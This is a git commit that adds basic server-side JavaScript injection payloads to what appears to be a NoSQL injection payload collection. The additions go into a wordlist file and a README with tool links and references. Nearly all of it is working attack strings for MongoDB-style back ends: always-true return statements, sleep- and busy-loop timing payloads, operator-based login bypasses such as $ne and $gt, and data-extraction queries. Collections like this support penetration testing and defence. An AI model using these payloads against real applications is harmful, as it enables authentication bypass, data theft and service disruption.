Added basic SSJI paylods

This commit is contained in:
Sanjay Das 2022-05-17 09:53:37 +05:30
parent 5035ed0891
commit af973ef0ad
2 changed files with 16 additions and 0 deletions

View File

@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
';sleep(5000);' ';sleep(5000);'
';sleep(5000);+' ';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true

View File

@ -19,6 +19,7 @@
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) * [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner)
## Exploit ## Exploit
@ -70,6 +71,14 @@ Extract data with "in"
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
``` ```
### SSJI
```json
';return 'a'=='a' && ''=='
";return 'a'=='a' && ''=='
0;return true
```
## Blind NoSQL ## Blind NoSQL
@ -165,6 +174,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
'%20%26%26%20this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''} {$gt: ''}
[$ne]=1 [$ne]=1
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
``` ```
## References ## References
@ -173,3 +185,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)